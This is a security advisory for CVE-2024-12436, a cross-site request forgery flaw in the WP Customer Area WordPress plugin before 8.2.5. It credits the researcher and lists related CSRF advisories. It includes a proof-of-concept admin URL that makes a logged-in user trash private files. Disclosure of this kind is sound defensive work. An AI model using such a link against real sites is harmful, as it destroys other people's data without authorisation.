WP Customer Area < 8.2.5 – Bulk Delete via CSRF | CVE 2024-12436 | Plugin Vulnerabilities

Description

The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks

Proof of Concept

To delete files in the customer area:

```
https://example.com/wp-admin/admin.php?post_type%3Dcuar_private_file&page=wpca-list%2Ccontent%2Ccuar_private_file&search-query=&search-field=title&start-date=&end-date=&_wpnonce=any1&action=cuar-trash&bulk_action=Apply&paged=1&posts%5B%5D=<<3647>>&posts%5B%5D=<<3646>>&action2=cuar-trash
```

Replace `<<3647>>` and `<<3646>>` with valid file IDs. 

Note: other bulk actions are likely vulnerable.

Affects Plugins

Fixed in 8.2.5

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

3345a403-f62c-40c1-b7ae-bc947591e02a

Timeline

Publicly Published

2025-01-06 (about 11 months ago)

Added

2025-01-06 (about 11 months ago)

Last Updated

2025-01-16 (about 11 months ago)

Other

Published

Title

Published

2024-03-28

Title

GamiPress < 6.8.6 - Cross-Site Request Forgery

Published

2023-07-07

Title

WP Dummy Content Generator < 3.0.0 - Cross-Site Request Forgery

Published

2023-10-25

Title

DeepL Pro API translation < 2.4.1.2 - Log Pruning via CSRF

Published

2025-01-03

Title

WP Simple Sitemap <= 0.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2023-03-16

Title

Import External Images <= 1.4 - CSRF